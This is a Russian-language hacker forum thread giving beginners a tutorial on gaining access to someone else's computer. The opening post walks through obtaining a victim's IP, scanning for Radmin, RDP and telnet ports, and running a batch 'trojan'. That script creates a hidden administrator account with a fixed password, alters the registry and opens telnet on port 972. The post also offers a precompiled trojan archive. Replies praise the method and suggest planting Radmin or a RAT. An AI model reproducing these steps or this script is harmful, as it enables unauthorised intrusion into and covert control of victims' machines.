Хакерский форум

Информация о пользователе

Привет, Гость! Войдите или зарегистрируйтесь.

Вы здесь » Хакерский форум » Новичкам » Получаем доступ к компу

Получаем доступ к компу

Сообщений 1 страница 12 из 12

1

Сегодня я расскажу вам как получить доступ к чужому компу.

Что понадобится для этого.

IP - жертвы
Сканер [X5 Spider]
Троян.bat

Значь погнали.

Узнаем IP жертвы. Заходим на сайт Ссылка Ссылка
[Нужно будет как-то впарить эти ссылки, сделать это можно с помощью сниффера вот ссылка на него Ссылка

Так теперь дальше. Узнали IP.  Попробуем сканировать на открытые порты программой [X5 Spider].  Сканируйте на эти порты 4889 Radmin или 3389 Remote Desktop ну и этот тоже 23 telnet . Напоминаю, если коннектились через Radmin т.е. порт 4889, значит понадобится программа Radmin Viewer   если через 3389, то просто заходим в Пуск > Стандартные > Подключение к удаленному рабочему столу. Но у вас заранее должен быть создан пользователь с админ правами. Значит дело будет не из легких, и ваша задача создать там своего пользователя. Это делается путем BAT файла

chcp 1251
net user SUPPORT_388945a0 /delete
net user karlson66 12345678 /add
net localgroup Администраторы karlson66 /add
net localgroup Пользователи SUPPORT_388945a0 /del
regedit /s conf.reg
sc config tlntsvr start= auto
tlntadmn config port=972 sec=-NTLM
net start Telnet

Этим батником вы создадите пользователя администратора, с именем karlson66 и паролем 12345678А
Затем в реестр задается настройка, скрывающая ваше имя в приветствии, т.е. вашего пользователя не будет видно, откроете порт 972 и активируете телнет(23) через него .

Если не поняли как сделать вирь, то вот готовый скомпилированный Трой пароль на архив k@rlson66
После того как вирь, откроет нам доступ к порту 972, мы сможем законнектиться, а затем уже через Telnet, чтобы удобнее было управлять компом.

0

2

Если можно сделай видео урок ато чтото янефигасиньке не пойму, и получится ли это сделать не по статистическому ip адресу а по динамическому?

0

3

Appleseed3005 написал(а):

Если можно сделай видео урок ато чтото янефигасиньке не пойму, и получится ли это сделать не по статистическому ip адресу а по динамическому?

Окей будет время, сделаю видео урок.

0

4

нет по динамическому ип не получиться , сам посуди , подключение на ип делаешь а как ты сделаешь его если ип поменяеться .
как говорят мудрые ДУМАЙ ГОЛОВА КЕПКУ КУПЛЮ

0

5

Admin)) написал(а):

Окей будет время, сделаю видео урок.

Кстати, вот помоему вопросу который я тебе озвучил в ЛС недавно, возможно поробывать ход этим конём :) сам щас попробу продимонстрировать на соседнем компьютере про тостю так сказать

0

6

И дай пожалуйста ссылку на скачивание сканера X5 Spider

0

7

мы раньше в сетке с помощью радмина прикалывались )))) установишь его по тихому клиенту, а потом угораешь над ним ))

0

8

Понравилось как создавать пользователя из командной строки. Самое полезное в данном посте как по мне.

0

9

Интересно, спасибо за информацию!

0

10

А Я ТО ДУМАЛ ЧЕМ СЕБЯ ПО ВЕСЕЛИТЬ!  СПАСИБО

0

11

по мне так лучше закинуть ему радмин или рат

0

12

Там онлайн сниффер не работает(